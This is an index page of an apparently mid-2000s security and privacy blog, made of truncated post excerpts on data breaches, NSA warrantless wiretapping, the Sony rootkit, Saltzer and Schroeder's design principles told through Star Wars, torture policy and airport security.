Via USA Today: Days after the Sept. 11 attacks, the head of the National Security Agency met his workforce at the nation’s eavesdropping and code-breaking headquarters at Fort Meade, Md., near Washington, for a pep talk. “I told them that free people always had to decide where to draw the line between their liberty and […]

 

America Needs a Full Time President

Ryan Singel has a post “Bush Wiretaps Supremely Illegal,” in which he discusses how this aspect of wiretaps are settled law. Perry Metzger’s excellent “A small editorial about recent events” is also worth reading: As you may all be aware, the New York Times has reported, and the administration has admitted, that President of the […]

 

Meth Addicts and ID Theft

There’s a great article in USA Today, “Meth addicts’ other habit: Online theft.” Unlike many articles of this type, the reporting is measured and carefully reported, and full of details that make it believable: One dumpster behind a call center in suburban Mill Woods proved to be a jackpot. In a nondescript strip mall just […]

 

Managing and the Red Cross

The other day on “On Point,” I heard some astoundingly clear exposition of executive management, in the words of Dr. Bernadine Healy, the former CEO of the Red Cross. The program, Examining The Red Cross was promoted as: When 9/11 came, the Red Cross was there — with mountains of Americans’ donations and support for […]

 

Bugger Frequent Flyer Miles

I want Frequent Flyer Hours. They’d work almost the same. You’d get 550 or so points per hour from gate to gate. So all that time, sitting on the runway, circling in a holding pattern, waiting for the previous plane to vacate your gate? All would be paid back in some small way to the […]

 

The shame of it all

[Adam updates: The reporter has recanted his story, “Federal agents’ visit was a hoax .”] Apparently, the Staasi are watching what we read. A senior at UMass Dartmouth was visited by federal agents two months ago, after he requested a copy of Mao Tse-Tung’s tome on Communism called “The Little Red Book.” Two history professors […]

 

Government Secrecy and Wiretaps

I’d like to respond to Dan Solove’s article “How Much Government Secrecy Is Really Necessary” with the perspective of a veteran of the 1990s crypto wars, in which we fought the NSA for the practical right to build and use encryption to protect sensitive data. A central tenat of the government’s position was that there […]

 

Lasalle Bank, 2 million mortgagees, SSNs, acct #s, "lost" tape

From Crain’s Chicago Business: LaSalle Bank Corp. says a computer tape bearing confidential information on about 2 million residential mortgage customers disappeared last month as it was being transported to a consumer credit company in Texas. The Chicago bank has alerted law enforcement authorities and is also monitoring transactions closely to detect any unusual or […]

 

Friday Star Wars: Open Design

This week and next are the two posts which inspired me to use Star Wars to illustrate Saltzer and Schroeder’s design principles. (More on that in the first post of the series, Star Wars: Economy Of Mechanism.) This week, we look at the principle of Open Design: Open design: The design should not be secret. […]

 

NSA Spying on Americans Without Warrants

“Bush Secretly Lifted Some Limits on Spying in U.S. After 9/11, Officials Say.” A 10 page story in the New York Times opens: Months after the Sept. 11 attacks, President Bush secretly authorized the National Security Agency to eavesdrop on Americans and others inside the United States to search for evidence of terrorist activity without […]

 

"What if Copyright law were strongly enforced…"

I can’t tell you how strongly tempted I am to just steal Daniel Solove’s “What If Copyright Law Were Strongly Enforced in the Blogosphere?” It’s a great article, and it would be deeply, deeply ironic for that article to be at the center of a lawsuit over copyright infringement.

 

No good deed goes unpunished

The folks at the Alabama Credit Union were informed that 500 of their customers were among those whose payment card information was stolen in the Sam’s Club breach. They took a conservative approach and reissued the cards for all 500 customers, and also informed them of the breach. As we’ve commented on previously, information concerning […]

 

White Wolf, Unknown number of Passwords, Hackers

The game company White Wolf is going offline because of internet attacks. This is a blending of several trends: Fuller disclosure of incidents, attackers who are only in it for the money, and the economic impact of attacks. Dear White Wolf Users, Like many other well-known companies of the last few years, White Wolf was […]

 

Conference News

Shmoocon has announced their 2006 speaker list. Today is the last day to submit to Codecon.

 

Insurance Claims and Privacy

One of the biggest issues I have with the gossip industry is how behavior that seems normal and expected is entered into databases and is used to judge us in unexpected ways. As the Tampe Tribune reports in “Insurers’ Road Service Could Prove Costly:” TAMPA – Andrea Davis can’t understand what two flat tires and […]

 

SANS.edu

Via Bejtlich, I learned that SANS is now offering degree programs. I have not been able to determine whether they are an accredited institution of higher learning, however.

 

Firm breached in Scottrade incident to sell business unit

From the press release: SALT LAKE CITY, Dec. 13 /PRNewswire-FirstCall/ — silex technology america, Inc. and TROY Group, Inc. signed a definitive agreement effective today stating that silex technology america will acquire the Wireless & Connectivity Solution Business of TROY Group, Inc. […] “We are pleased to announce this transaction as we believe that the […]

 

Fake Fingerprints

Fingerprint scanning devices often use basic technology, such as an optical camera that take pictures of fingerprints which are then “read” by a computer. In order to assess how vulnerable the scanners are to spoofing, Schuckers and her research team made casts from live fingers using dental materials and used Play-Doh to create molds. They […]

 

Torturing People

Last week, Secretary of State Condoleezza Rice made a speech in which she made apparently definitive statements about our policies towards torture. See Jack Balkin, “Rice: ‘U.S. Personnel’ Don’t Enage in Cruel, Inhuman and Degrading Treatment ”Wherever They Are.’” Then be sure to see Marty Lederman’s follow-up, “Condi Rice’s ‘No Torture” Pledge: Don’t Believe the […]

 

"Aid to the Church in Need", 2000 donors to charity, "personal details"

Not sure if the personal details obtained by hackers include CC#s, but names and addresses are certainly involved in this breach at a UK charity. A couple of interesting twists to this one, as reported at Silicon.com. First, the thieves weren’t content with just stealing the info — they used it to extort victims directly: […]

 

Web Certificate Economics

In a comment on “Build Irony In,” “Frank Hecker writes:” First, note that the “invalid certificate” message when connecting to buildsecurityin.uscert.gov using Safari is *not* because the certificate is from an unknown CA (or no CA at all); it’s because the certificate is issued to the server/domain buildsecurityin.us-cert.gov (note the dash) and thus doesn’t match […]

 

Tracking Graz (Austria)

Speaking of tracking and databases: Mobile Landscape Graz in Real Time harnesses the potential of mobile phones as an affordable, ready-made and ubiquitous medium that allows the city to be sensed and displayed in real-time as a complex, pulsating entity. Because it is possible to simultaneously ‘ping’ the cell phones of thousands of users – […]

 

Planespotters vs. the CIA

Ever-increasing requirements that every item be uniquely identifiable are combining with the power of the internet to invade everyone’s privacy. The Guardian (UK) has a story about how ‘planespotters’ are gathering data that allows the after-the-fact tracking of CIA torture planes. (“How planespotters turned into the scourge of the CIA.”) Paul last saw the Gulfstream […]

 

Passwords: Lessons for Japan Airlines from Harry Potter

This is weak authentication in all its glory. The password is shared by every member of a House. It is a static password, changed annually. Moreover, the fat lady’s password challenge never asks students for identity. I cannot recall any incident where a house ghost barred entrance to a student because he was a member […]

 

Star Wars and Separation of Privilege

As we continue the series, illustrating Saltzer and Schroeder’s classic paper, “The Protection of Information in Computer Systems,” we come to the principle of separation of privilege. Separation of privilege: Where feasible, a protection mechanism that requires two keys to unlock it is more robust and flexible than one that allows access to the presenter […]

 
 

Estimating breach size by fraud volume

Much is being made of a press release from ID Analytics. Based on results from that firm’s fraud detection products, a conservative estimate is that one of every 1000 pieces of PII lost in a data breach results in an actual fraud. An additional finding is that the likelihood of a fraud being committed using […]

 

Is the Database Half-Wrong, or Half-Right?

More than 8,000 people have been mistakenly tagged for immigration violations as a result of the Bush administration’s strategy of entering the names of thousands of immigrants in a national crime database meant to help apprehend terrorism suspects, according to a study released on Thursday. The study, conducted by the Migration Policy Institute, a research […]

 

0Day on Ebay

“Brand new Microsoft Excel Vulnerability:” The lot: One 0-day Microsoft Excel Vulnerability Up for sale is one (1) brand new vulnerability in the Microsoft Excel application. The vulnerability was discovered on December 6th 2005, all the details were submitted to Microsoft, and the reply was received indicating that they may start working on it. It […]

 

Elements of Blogging Style

I’ve often thought that I over-analyze some things. But as I enjoy blogging, I’ve come to realize that having standards about the little things helps me write faster and more effectively. More importantly, I hope, they allow you to skim here faster, and retain more of what you’re reading. Bloggers who want to be read […]

 

Deborah Davis Charges Dropped, Rally to Proceed

Ann Harrison reports: The government dropped all charges against Deborah Davis yesterday for failing to show her ID on a Denver public bus. Officials claim that passengers still have to show ID to transit through the Denver Federal Center, but said there were no clear signs to inform them of this requirement. Davis’ lawyers are […]

 

EPIC on RFID Passports

According to documents (pdf) obtained by EPIC under the Freedom of Information Act, a government report found significant problems with new hi-tech passports. Tests conducted last year revealed that “contactless” RFID passports impede the inspection process. At a meeting of a Privacy Advisory Committee today in Washington, EPIC urged (pdf) the Department of Homeland Security […]

 

Muffett on Passwords

In “OpenSolaris, Pluggable Crypt, and the SunMD5 Password Hash Algorithm,” Alec Muffett writes: Several years ago now, Darren Moffat, Casper Dik and I started swapping e-mail about how pathetic it was to still be using the traditional 8-character-password unix crypt() routine in Solaris, and how we could architect something to be much better. You’d have […]

 

Sam's Club, CC #'s and more?, they're not saying

American Banker(12/7/2005) reports [warning: paywall] on the tight-lipped reaction of Sam’s Club, MasterCard, and Visa to a recent data breach involving credit and debit card mag stripe data from Sam’s Club gas stations. The affected cards seem to have been primarily from two issuers, and hundreds of actual frauds have already occurred. Nobody is talking […]

 

A little knowledge is a dangerous thing

Bruce Schneier demonstrates the truth of the old saying in a must-read blog entry. In a nutshell, Nature published an article written by a physicist with little or no background in cryptography, claiming to have devised a mechanism foroptically transmitting encrypted messages using a “chaotic carrier”. Bruce trains his skeptical and expert eye on the […]

 

Tens of Thousands Mistakenly on Watchlists

[Important update below] Nearly 30,000 airline passengers discovered in the past year that they were mistakenly placed on federal “terrorist” watch lists, a transportation security official said Tuesday. Jim Kennedy, director of the Transportation Security Administration’s redress office, revealed the errors at a quarterly meeting convened here by the U.S. Department of Homeland Security’s Data […]

 

Hey, Look, It's Matasano!

Tom Ptacek’s blog is full of smart people introducing themselves, and their new company, Matasano. They’re talking about the new mix, which is to be consultants while you build your startup and look for funding. I hope that Window, Dave, and Jeremy all get the blogging bug. Heck, I hope Dino does too, because with […]

 

Economics of Fake ID (Kremlin Edition)

Russian security agents have arrested a group of policemen and civilians suspected of forging Kremlin passes. The items seized included identity cards guaranteeing entry to President Vladimir Putin’s offices, the FSB security service said. … According to security officials, some of the items were being sold at a car market in the south of Moscow, […]

 

Fighting Terror: Police, not Armies

Democracies do not fare well with military dictators, nor when entrusted to overpowering and internally focused armies. Armies are trained, quite rightly, to kill and ask questions later. Police forces are trained to exercise discretion, sustain the rule of law, respect human rights, understand the freedoms we have embodied neatly in a Bill of Rights […]

 

Speaking of Ethical: Brad Feld on Philanthropy

I’d like to draw attention to venture capitalist Brad Feld’s post, “Doing Good By Doing Well:” I’ve strongly encouraged my portfolio companies to incorporate “philanthropic activities” into their businesses early in their life. I don’t advocate any particular focus – I simply encourage founders and leadership teams to think about what they can do to […]

 

Ethical Behavior

Chuck Tanowitz has an interesting post “Ethicist in the Boardroom?” in which he expounds on … a discussion with Phil Libin a while back he suggested that companies should have an ethicist on board. More specifically, he suggested an outside ethics consultant to help keep them on track. The post is worth reading in its […]

 

American Torture Chambers

After the Second World War, Germans claimed they didn’t know what was being done to Jews, Catholics, Gays, Gypsies and others by their government. We, as Americans, have no such excuse. We know what’s being done in our name, and have failed to stop it. The American government is torturing prisoners, and sending prisoners to […]

 

Like Taking Candy from a Database

Candice “Candy” Smith, 44, of Blue Springs, Mo., pleaded guilty to making unauthorized inquiries into data aggregator LexisNexis’s database of non-public information on millions of consumers, such as driver’s license information and credit-history data. Many people might assume that only cops can look up this type of information, but Smith was granted access to the […]

 

Guerrilla Identity Protection

Next time you call customer service to manage one of your accounts and they ask you for pseudo-private information like your SSN or Mother’s maiden name, ask them for their name. When they ask why (feel free to prompt since this probably isn’t completely out of the ordinary) let them know that you are keeping […]

 

More on What Not To Get Me, Or Anyone

Bob Sullivan has a good post, “Gift card fees still playing Scrooge:” How much is that $50 gift card really worth? Well, it’s hard to say. The art of irritating and sneaky fees has reached new heights in this 21st century version of gift certificates. There are sign-up fees, transaction fees, dormancy fees and outright […]

 

Disclosure Rules are Changing (Salem, MA Schools, 'several dozen psych profiles')

A school psychologist’s records detailing students’ confidential information and personal struggles were accidentally posted to the school system’s Web site and were publicly available for at least four months. … The psychological profiles, some dating back more than a decade, contained children’s full names, birthdays and, in many instances, IQ scores and grades, the newspaper […]

 

It's Christmas Time in New Orleans

It’s no ordinary holiday season in the Gulf Coast this year, so Frank Evans built an unconventional holiday display at a suburban New Orleans shopping mall to match. He thought the tiny blue-tarped roofs, little toppled fences and miniature piles of hurricane debris in the display he builds annually for the mall struck just the […]

 

Cornell, 900 SSNs, "breach"

Cornell employees this past summer discovered a security breach on a computer that contained personal information, such as names, addresses, social security numbers and bank names and account numbers. After conducting an analysis of the breach, Cornell Information Technology (CIT) did not find evidence that any information stored on the computer had been inappropriately accessed. […]

 

Nick Szabo Blogging

Nick is a premier thinker about history, law and economics, and the lessons they have for security. Take this brief sample from “Origins of the joint-stock corporation:” The modern joint-stock corporation has many sources in medieval Europe. First among these was corporate law itself. Although the era is commonly referred to as “feudalism,” for the […]

 

Star Wars and Least Common Mechanism

Today, in Friday Star Wars Security blogging, we continue with Saltzer and Schroeder, and look at their principle of Least Common Mechanism: Least common mechanism: Minimize the amount of mechanism common to more than one user and depended on by all users [28]. Every shared mechanism (especially one involving shared variables) represents a potential information […]

 

The Future of Scientific Research

There’s a fascinating set of articles in Nature this week on openness, sharing, and new publication models. From “Science in the web age: Joint efforts:” “Science is too hung up on the notion of ‘the paper’ as the exclusive means of scientific communication,” says Leigh Dodds, a web expert at the publisher Ingenta. Publication and […]

 

DMCA vs. Security Research

Last month, I commented on how the DMCA was preventing research on spyware: …the legal cloud that overhangs this sort of research. That legal cloud was intentionally put there by the copyright industry, in the form of the Digital Millennium Copyright Act. The law makes it hard to understand what research you can perform when […]

 
 

Costs of Breaches

The Ponemon Institute continues to analyze the cost of breaches. Their latest work is distributed by PGP, Inc. The work that they’re doing is quite challenging and useful, but is unlikely to be a complete accounting of the costs. For example, what’s the real cost of the brand damage done to Choicepoint? Along with several […]

 

Fake ID Markets

Social Security cards run about $20, green cards about $70 and a California driver’s license between $60 and $250. The price jumps up for higher-quality documents, such as IDs with magnetic strips containing real information — often from victims of identity theft. … “You name it, they can make it,” said Los Angeles Deputy City […]

 

More info, thoughts on Troy Group breach

In an interesting article, The St. Louis Post Dispatch reports new information about the recent breach of the “eCheck Secure” system run by Troy Group. According to the article, the number of potential Scottrade victims is 140,000. Troy Group published a news release revealing they got hacked, and notified their financial sector customers, including Scottrade, […]

 

EFF: Why Bother With DMCA comments?

The EFF has decided that the DMCA “rulemaking process is simply too broken” for them to bother commenting on it any further. See “DMCA Triennial Rulemaking: Failing Consumers Completely:” EFF has participated in each of the two prior rulemakings (in 2000 and 2003), each time asking the Copyright Office to create exemptions for perfectly lawful […]

 

Netgear WGPS606 and Mac Printing

I recently bought a Netgear WGPS606 ‘print server.’ It’s a nifty little device with a 4 port 100mbs ethernet switch, a wireless bridge, and an LPD print service. I needed each of those as part of reconfiguring my office space, and here it was in one little package. It turned out to be something of […]

 

NJ's Strong Privacy Law

Apparently, I woke up on the right side of the bed, and am just handing out kudos left and right today. Consumers will gain strong new protections when New Jersey’s Identity Theft Prevention Act takes effect Jan. 1, but businesses and institutions are facing headaches and added expenses. Social Security numbers will be out as […]

 

UNC Addresses Risk Systemically, Rather than Piecemeal

Students are currently recognized by their Social Security Number in many University systems and applications. With the growing threat of identity theft, an alternative method has been desired for identifying students and faculty. The opportunity to execute this change has surfaced through the implementation of an updated University [of North Carolina] computer system. Kudos to […]

 

TSA to Revise Rules

[Updated with data from NYT] A new plan by the Transportation Security Administration would allow airline passengers to bring scissors and other sharp objects in their carry-on bags because the items no longer pose the greatest threat to airline security, according to sources familiar with the plans. The TSA’s internal studies show that carry-on-item screeners […]

 

Centers for Disease Control Want To Track All Travel

In “CDC plans flight e-tracking,” Bob Brewin of Government Health IT writes: Battling a pandemic disease such as avian flu requires the ability to quickly track sick people and anyone they have contacted. In response, Centers for Disease Control and Prevention officials have proposed new federal regulations to electronically track more than 600 million U.S. […]

 

Web Browser Developers Work Together on Security

Adam’s post earlier today on efforts to improve browser security, reminded me about this post on KDE.news. George Staikos hosted a meeting of developers from Opera, IE, Mozilla/Firefox and Konqueror with an aim towards improving browser security across the board. Of particular interest to me in light of my intro post, were these two lines: […]

 

More on Deborah Davis

The story of Deborah Davis is getting lots of attention. Rob sent me Refusal to present ID sparks test of rights, which includes: “I boarded the bus and spoke with the individual, Deborah N. Davis . . . asking why she was refusing,” wrote the first Federal Protective Service officer in an incident report posted […]

 

Effective Privacy Law Requires Penalties

Michael Geist has a column today “Canada’s Privacy Wake-Up Call” in which he follows up on the Macleans story about the Canadian Privacy Commissioner’s phone records being stolen. (See my “Epic Problems With Phone Privacy.”) Although major Canadian telecommunications providers such as Bell Canada sought to characterize themselves as “victims” of fraudulent activity and claim […]

 

Don't Tell People What Not To Do!

[Update: If I’d been able to find the page which Arthur provided in a comment, I wouldn’t have written this quite like this.] It’s rare to see a substantial usability mistake at Google, and so this jumped out at me. Saar Drimer has a post on the new “Gmail password strength check,” in which he […]

 

Hoder's Denial

Recently, Hossein Derakhshan blogged about his denial of entry into the United States. (“Goodbye to America.”) This is really too bad. Hoder’s an insightful fellow, and even if he happened to be one of the 15 or so million living in the United States without official permission, we profited from his visits. I believe that […]

 

Defensive driving

As most parents of young children would no doubt attest, when driving with “precious cargo” — lives you particularly want to protect — you typically take extra precautions. Special safety seats with five point harnesses, specialized mounting hardware, taking that bit of extra care that maybe you wouldn’t if driving alone. Well, that may all […]

 

On Torture

I sometimes feel that I have nothing to add to the “debate” around torture, other than the formerly-obvious “torture is ineffective and morally repugnant.” Nevertheless, I feel that keeping silent, or even allowing the debate to occur without adding my voice to the chorus of reason. So, some others’ posts this past week: In Jack […]

 

Scottrade, Millions of "E-secure" system users, SSNs, account numbers, etc, "hacker"

Info is spotty on this, but according to a WFMY TV News report, Millions of names, addresses, social security numbers, and bank account numbers could be in dangerous hands. Officials with Scottrade, an investment company with an office in Greensboro say a security breach compromised the information of some of its account holders. A letter […]

 

Books: "Innocent Code" and "19 Deadly Sins"

I’m going to review Innocent Code (IC) and The 19 Deadly Sins of Software Security (19DS) in the same review because I think they’re very similar in important ways. There have been probably close to a dozen books now on writing code with good security properties. Many of the early ones had to lay out […]

 

Make Mine Sony-Free

As the holiday and gift-shopping season arrives, I’d like to talk about what not to get me (or really, anyone on your list). A bad gift is really painful to receive. You have to put on a fake smile and pretend to be happy, and then go return the thing at the first opportunity. My […]

 

No Friday Star Wars Security Blogging Today

Blame Tom Ptacek for ignoring my heroic efforts. My being off with family this week has nothing to do with it. Friday Star Wars Security posts will return next week, with the principle of Least Common Mechanism.

 

Happy Thanksgiving!

As you enjoy your Turkey, recall that the Pilgrims who ended up in Plymouth were fleeing the Anglican church, England’s state religion. The English church, of course, split from the Roman church so that Henry VIII could get a divorce. The little people, however, were not allowed the chance to split their churches in quite […]

 

My Software is Mine.

People often become emotionally entangled with the software they use. It’s not a geek-only thing, although geeks often become more entangled with a broader range of the software they use. Normal people speak of “My Excel is screwed up,” or feel bad that their Sony CD has messed things up for them. One of the […]

 

Australian Minister Vanstone on Stupid Security

An Australian Senator has created a bit of a kerfuffle by saying what everyone has thought in private. Bruce Schneier comments: During her Adelaide speech, Senator Vanstone implied the use of plastic cutlery on planes to thwart terrorism was foolhardy. Implied? I’ll say it outright. It’s stupid. For all its faults, I’m always pleased when […]

 

Book: Who Becomes a Terrorist and Why

I found “Who Becomes a Terrorist and Why” in a used bookstore for $2.99, and it was worth every depressing penny and more. The book is a US government funded study from 1999. It’s not clear if this work would be possible today or not. Much of the body of the book is a an […]

 

Aspirin and the Regulation of Medicine

As we discuss the effects of various laws designed to protect us from various and sundry, we often lose track of the real, tangible benefits of liberty that we’re giving up. They’re sometimes hard to see, in the same way the Internet was hard to see in the early 90s. It was here, but most […]

 

Deborah Davis and the Denver "Public" Transit System

On the 9th of December 2005, a Denver woman is scheduled to be arraigned in U.S. District Court. Her crime: refusing to show ID on a public bus. At stake is nothing less than the right of Americans to travel freely in their own country. The woman who is fighting the good fight is named […]

 

A great idea whose time has come

Ben Edelman explains how Sony can use a messaging mechanism already built into the XCP system to inform people who are not yet aware of the “Sony rootkit” they’ve unwittingly installed, and what they can do about it. This is so obviously the right thing to do that I can almost guarantee Sony will not […]

 

Book: Secure Architectures with OpenBSD

Jose Nazario gave me a copy of Secure Architectures with OpenBSD this summer. I’m way behind with book reviews, and I wanted to start with this one. I’m a fan of the OpenBSD project. Not only for their efforts around security, but also because they put a great deal of effort into the documentation. I’ve […]

 

More on "Freedom To Tinker, Freedom to Learn"

In “Freedom To Tinker, Freedom to Learn,” I made some assumptions about the user interface for the $100 laptop. In “Alan Kay at WSIS,” Ethan Zukerman explains that Alan Kay will be doing much of the user interface design work: Kay began by explaining that most people aren’t using computers to do the most important […]

 

Google buys Riya, Steamrollers Your Pictures' Anonymity

Riya is a Redwood City startup that makes facial recognition software. Rumor from Om Malik says Google is buying them. I believe that this purchase has some of the farthest reaching privacy implications we’ve yet seen from Google. Anonymity, in its most literal meaning of “without a name,” is the current state of many photographs […]

 

Boeing, 161,000 SSNs, Stolen laptop

A laptop computer containing names, social security numbers and other sensitive information of 161,000 current and former employees of Boeing Co. was stolen recently, the U.S. aerospace manufacturer said Friday. From “Boeing says laptop with employee info stolen.” A bit more in the Seattle Post-Intelligencer.

 

Indiana University, 5300 students, malware

According to an Associated Press article appearing in the Indianapolis Star, Personal information about nearly 5,300 Indiana University students might have been accessed by a computer hacker, school officials said. Technicians discovered during a routine scan that three malicious software programs had been installed on a Kelley School of Business instructor’s computer in mid-August, said […]

 

Star Wars and the Principle of Least Privilege

In this week’s Friday Star Wars Security Blogging, I’m continuing with the design principles from Saltzer and Scheoder’s classic paper. (More on that in this post.) This week, we look at the principle of least privilege: Least privilege: Every program and every user of the system should operate using the least set of privileges necessary […]

 
 

ex-MI5 Head: ID Cards are a Bogus National Security Measure

Dame Stella Rimington has said most documents could be forged and this would render ID cards “useless”. “But I don’t think that anybody in the intelligence services, particularly in my former service, would be pressing for ID cards. From the BBC, “Ex-MI5 chief sparks ID card row.” Normally, a “row” requires two sides, with arguments. […]

 

Panexa

How did Sivacracy manage to rope in the sponsorship dollars? I really need to monetize some sticky eyeballs here. Meanwhile, click the image for more on Panexa.

 

The Importance of Due Process to Gary Gordon Smith, Abu Bakker and Adel ?

The United States is holding captive at Guantanamo Bay at least two men it knows are innocent of any wrongdoing. These men were cleared by the military courts, almost two years ago, and they are still in captivity. It makes me too angry to write about, so go read Requiem: In the comments to an […]

 

Sony's Rootkit and the DMCA

Bruce Schneier has a good article [on his blog and] in Wired this morning, “Real Story of the Rogue Rootkit.” One aspect of the whole Sony story that’s not getting a lot of play is why we don’t see more of these things. Is Sony unique in their callous disregard of their customers, or are […]

 

Industry to Customers: "You're Reckless and Apathetic"

It’s a long standing “joke” that only drug dealers and the computer industry call their customers “users.” But at least drug dealers pretend that your behavior is ok. Not so the Universities educating our next generation of programmers, such as Carnegie Mellon. Their student news source, the Tartan, reports in “Study shows students cause computer […]

 

Delicious, Feed Me!

Del.icio.us is a ‘social bookmark manager.’ It’s a way to bookmark things, and let you see that I’ve bookmarked, and perhaps commented on them. I’m using it more like a “clip blog,” with short commentary on many of the things dropped there. If you read it via the RSS feed, you get my commentary. But […]

 
 

Torture and the "Ticking Bomb" Argument

Alex Tabarrok has some interesting arguments as to why torture should be made illegal in “Torture, terrorism, and incentives.” I’d like to extend his argument: President Bush, Dick Cheney and others who support the use of torture by the United States and its agents usually rely on the ticking time bomb argument. Sometimes torture is […]

 

What I Want From A Log Analyzer

I’m becoming less and less satisfied with AWStats as a log analyzer. There are some things that it does reasonably well. But I’d really like a lot more. I’d like to be able to see how things have changed day to day (for example, how many new unique visitors did I get today?) I’d like […]

 

Choicepoint's Custom Products

I appreciate all the notes you’ve been sending me telling me about “FBI, Pentagon pay for access to trove of public records.” I’d love to have something insightful to add to this, but I don’t. Ryan Singel has a bit more: The article, which relies on heavily redacted documents acquired through an open government request, […]

 

Epic Problems With Phone Privacy

In the cover story of next week’s Maclean’s magazine, Jonathon Gatehouse reports that he successfully obtained the phone records of Canadian Privacy Commissioner Jennifer Stoddart: …Her eyes widen as she recognizes what has just been dropped on the conference table in her downtown Ottawa office — detailed lists of the phone calls made from her […]

 

Under The Weather

I’m feeling under the weather today, and so I’m sitting on the morning posts until I have a chance to re-read them. Expect posting to be heavy today, because I can’t do much real work, and have to entertain myself somehow. I’m hopeful that you’ll either be entertained as well, or forgive me for what […]

 

Unintended Consquences of Blackhat '05

(by arthur) I’m back from travels, so it’s time to post some more…. As Adam just posted, Jeff Moss sold Blackhat to CMP Media. Presumably, this sale is partially (largely?) a result of the various lawsuits that Blackhat was dealing with as fallout of “Cisco-gate”. Fortunately, these were recently settled in an equitable fashion, but […]

 

BlackHat Pwned!

MANHASSET, N.Y., Nov. 15 /PRNewswire/ — CMP Media, a marketing solutions company serving the technology, healthcare and entertainment markets, announced today that it has acquired Black Hat Inc., a producer of information security conferences and training that includes Black Hat Briefings and Conferences. Jeff Moss, founder and owner, will continue to run Black Hat and […]

 

568,200 DNS servers Know Sony

Dan Kaminsky has done some digging into the Sony rootkit: It now appears that at least 568,200 nameservers have witnessed DNS queries related to the rootkit. How many hosts does this correspond to? Only Sony (and First4Internet) knows…unsurprisingly, they are not particularly communicative. But at that scale, it doesn’t take much to make this a […]

 

Freedom To Tinker, Freedom to Learn

In “The $100 Laptop Moves Closer to Reality,” the Wall St Journal discusses a project to provide very inexpensive laptops to millions of poor children around the world. I think its a great idea, and wish them the best of luck. Delivering internet connectivity to millions of poor children will be a world-altering project. One […]

 

"To none will we sell, to none deny or delay, right or justice."

The United States senate voted today to deny habeas corpus to prisoners at Guantanamo. The United States Supreme Court had recently held that United States courts have jurisdiction to consider challenges to the legality of the detention of foreign nationals captured abroad in connection with hostilities and incarcerated at Guantanamo Bay. The vote today would […]

 

Simplify!

The sad passing of Peter Drucker, and Paul Kedrosky’s post on it brought something into sharp focus for me. It’s the value of working hard to make yourself understood, as opposed to making your audience work hard to understand you. One of my goals in blogging here is to learn to be understandable to the […]

 

NISCC Does It Their Way: Poorly

A post by Paul Wouters to the DailyDave list drew attention to “Vendor response of the Openswan project” to “NISCC Vulnerability Advisory 273756/NISCC/ISAKMP.” I feel like its 1997 again. The Oulu University Secure Programming Group (OUSPG) discovered a number of flaws with the ISAKMP/IKE portions of the IPSec protocols. OUSPG built a tool, and either […]

 

New, Useful, and Non-Obvious

My friend Sharon, who is an excellent patent attorney, showed me this, her favorite U.S. patent. You should hire her![1] She’s really good, even if she does a lot of work for an empire of questionable morals, but is not yet so evil as to have written anything like US Patent 4,646,382, “Lottery Ticket Scraper:” […]

 

Gordon Johnston vs. The NFL Who Cried Wolf

Gordon Johnston didn’t want to be frisked. So as the 60-year-old high school teacher approached the gates of Raymond James Stadium here for a Buccaneers football game last month, he lifted the team jersey he was wearing to show it wasn’t necessary. He was concealing no bombs. It didn’t work. So reports the Washington Post […]

 

Kill Bill's Browser (and Comments)

Some folks have put up a site, “Kill Bill’s Browser,” based on Google’s offer to pay up to $1 for each Firefox/Google Toolbar install. It offers up both good and entertaining reasons to switch: 7. It will make Bill Gates soooooooooo mad. Seriously– super, super mad. And even more than Bill, let’s think about Steve […]

 

MIT Researchers on Radio Shielding

Abstract: Among a fringe community of paranoids, aluminum helmets serve as the protective measure of choice against invasive radio signals. We investigate the efficacy of three aluminum helmet designs on a sample group of four individuals. Using a $250,000 network analyser, we find that although on average all helmets attenuate invasive radio frequencies in either […]

 

Friday Star Wars and the Principle of Complete Mediation

This week in Friday Star Wars Security Blogging, we examine the principle of Complete Mediation: Complete mediation: Every access to every object must be checked for authority. This principle, when systematically applied, is the primary underpinning of the protection system. It forces a system-wide view of access control, which in addition to normal operation includes […]

 

Macs and Sony's Rootkit

[Update: Welcome Wired readers! If you enjoyed Bruce Schneier’s article on who’s responsible for security flaws, please explore a little. The economics of security and privacy issues are an ongoing theme.] It wasn’t a plan that I was going to slag Apple this week. Really, I’m fond of my Mac, I’m just tired of claims […]

 

R-E-S-P-E-C-T! Find Out What It Means to Tom Peters

Tom Peters has a magnificent article, “Simple.” Go read the article. It’s really beautiful. Don’t mistake simple for easy, but this is an easy read about the need for respect in winning the cooperation of whomever you’re dealing with: “We were friendly and respectful whenever we met a Bedouin or farmer, often sharing tea with […]

 

This is convergence, too :^)

The Amazon Mechanical Turk. Basically, you have your code do a remote procedure call, where the bulk of the work on the remote side is performed by a human being.

 

Preserving the Internet Channel Against Phishing, Part 2

At this point I was pretty sure this was a social engineering attack, so I started to quiz her about why she needed the information. She said it was for a “security check”. I told her I was uncomfortable giving out information like this to a cold caller over the phone and she said it […]

 

Kudos to Microsoft, Brick-brats to Apple

MS05-038 and MS05-052 contain a number of defense-in-depth changes to the overall functionality of Internet Explorer. These changes were done mostly for security reasons, removing potentionally unsafe functionality and making changes to how Internet Explorer handles ActiveX controls. As a result of these changes that we made for security sake, for a limited amount of […]

 

This is convergence

A gamer who spent £13,700 on an island that only exists in a computer game has recouped his investment, according to the game developers. The 23-year-old gamer known as Deathifier made the money back in under a year. The virtual Treasure Island he bought existed within the online role-playing game Project Entropia. He made money […]

 

Digital Pearl Harbor

[U]se of commercial products with unbreakable cryptography could seriously undermine the ability of law enforcement to perform critical missions such as protecting against threats posed by terrorists, organized crime, and foreign intelligence agents This from a rather lightweight report prepared by the Congressional Research Service. I may have read it with a jaundiced eye, but […]

 

Canadian Air Transport Security Authority to Hire Angelina Jolie

In the midst of a CBC story about how a consultant went through “door after door” in Toronto’s Pearson airport (“Investigation highlights security concerns at Canadian airports“), we’re treated to these lovely tidbits: Mark Duncan, chief operating officer for the Canadian Air Transport Security Authority, the agency tasked with providing security at Canadian airports, says […]

 

The Approaching Apple OSX86 Security Nightmare

In the midst of an excellent long article on how the Wine Windows emulation layer will interact with OSX86, (“I invite you to wine“), Wil Shipley writes: When you can run Windows apps on Mac OS X, you’ll still be protected by Mac OS X. Viruses are going to be dead. D-E-D. Ok, yes, there […]

 

Transunion, 3,623 SSNs, Stolen Computer

Social Security numbers and other information about more than 3,000 consumers were stolen recently from TransUnion LLC, one of three U.S. companies that maintain credit histories on individuals, in the latest of many security breaches that have focused congressional attention on identity theft and fraud. The data were housed in a desktop computer that was […]

 

How Much Goodwill is 17,000 Letters Worth?

